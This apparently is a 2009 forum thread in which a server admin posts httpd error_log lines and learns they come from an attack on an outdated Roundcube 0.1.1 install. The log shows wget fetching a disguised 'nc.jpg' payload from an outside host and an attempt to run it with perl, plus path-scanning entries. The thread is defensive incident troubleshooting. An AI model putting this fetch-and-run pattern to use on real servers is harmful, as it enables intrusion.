whats this in the httpd error_log?

[lethal0r]

is this someone downloading something onto my server? how are they doing it?

sh: W: command not found
Can't open perl script "nc.jpg": No such file or directory
--10:26:54--  http://shnitzel.land.ru/nc.jpg
           => `nc.jpg'
Resolving shnitzel.land.ru... 82.204.219.223
Connecting to shnitzel.land.ru[82.204.219.223]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 895 [image/jpeg]

    0K                                                       100%    8.54 MB/s

10:26:54 (8.54 MB/s) - `nc.jpg' saved [895/895]

 

[lethal0r]

ok so this gayer is somehow downloading that file to my server tmp directory. its not actually a jpg its got a rootkit inside.

how are they putting it into tmp? is there a way I can find out?

 

[floyd]

There is probably a php script doing it. What version of Roundcube do you have?

 

[lethal0r]

its 0.1.1.

interesting you say that because the previous lines in the error log are

[Tue Mar 17 10:26:17 2009] [error] [client 88.2.201.88] File does not exist: /var/www/html/mail
[Tue Mar 17 10:26:17 2009] [warn] [client 88.2.201.88] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
[Tue Mar 17 10:26:17 2009] [error] [client 88.2.201.88] File does not exist: /var/www/html/roundcubemail
[Tue Mar 17 10:26:17 2009] [warn] [client 88.2.201.88] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed

do you think this is the script searching for these?

the directory its installed in is called 'roundcube'. so I guess that would be the next directory the script searched for and it found it!

I have just deleted the directory - I dont use roundcubemail - will this be enough to protect the server from this attack?

 

[lethal0r]

ive just read up on the roundcube bug. looks like im a lucky boy to still have my server.

so thats why I had about 50 SSHD processes running last night :/

i must take this as a lesson and keep things up to date.